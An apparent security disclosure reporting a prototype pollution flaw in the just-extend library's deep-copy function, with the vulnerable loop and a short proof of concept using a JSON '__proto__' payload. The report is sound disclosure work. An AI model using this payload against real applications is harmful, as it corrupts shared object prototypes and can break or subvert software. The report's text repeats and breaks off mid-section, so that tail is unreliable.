hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
Vulnerable File: just-extend/index.cjs (and index.mjs)
Vulnerability Type: Prototype Pollution
Severity Level: Critical
Vulnerability Analysis:
In deep copy mode (deep=true), the extend() function only uses Object.prototype.hasOwnProperty.call(extender, key) to check when iterating over the keys of the extender object, but fails to filter dangerous property names such as proto, constructor, and prototype. Attackers can contaminate Object.prototype by constructing malicious objects containing proto, affecting all objects.
Vulnerable Code (index.cjs Lines 37-50):
for (var key in extender) {
if (Object.prototype.hasOwnProperty.call(extender, key)) {
var value = extender[key];
if (deep && isCloneable(value)) {
var base = Array.isArray(value) ? [] : {};
result[key] = extend(true, ..., value); // key not filtered for __proto__
} else {
result[key] = value; // key not filtered for __proto__
}
}
}POC:
const extend = require('just-extend');
// Verify before attack
const testObj = {};
console.log('Before:', testObj.polluted); // undefined
// Construct malicious payload
const malicious = JSON.parse('{"__proto__":{"polluted":"yes"}}');
extend(true, {}, malicious);
// Verify after attack - all objects are polluted
const newObj = {};
console.log('After:', newObj.polluted); // "yes"
hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
Vulnerable File: just-extend/index.cjs (and index.mjs)
Vulnerability Type: Prototype Pollution
Severity Level: Critical
Vulnerability Analysis:
In deep copy mode (deep=true), the extend() function only uses Object.prototype.hasOwnProperty.call(extender, key) to check when iterating over the keys of the extender object, but fails to filter dangerous property names such as proto, constructor, and prototype. Attackers can contaminate Object.prototype by constructing malicious objects containing proto, affecting all objects.
Vulnerable Code (index.cjs Lines 37-50):
POC: